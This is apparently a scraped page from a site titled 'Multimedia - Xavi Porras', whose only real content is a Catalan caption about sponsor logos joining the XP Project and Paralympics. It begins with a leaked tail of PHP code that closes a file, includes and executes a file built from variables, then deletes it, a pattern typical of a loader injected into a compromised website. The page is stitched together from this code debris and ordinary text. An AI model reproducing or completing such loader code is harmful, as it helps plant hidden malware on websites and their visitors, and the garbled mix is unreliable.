");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Multimedia - Xavi Porras

Imatge on apareixen els logotips dels patrocinadors MANXA, La Finestra sul Cielo i JPS English School que ja s’han afegit al Projecte XP i Paralímpicos com a estament oficial.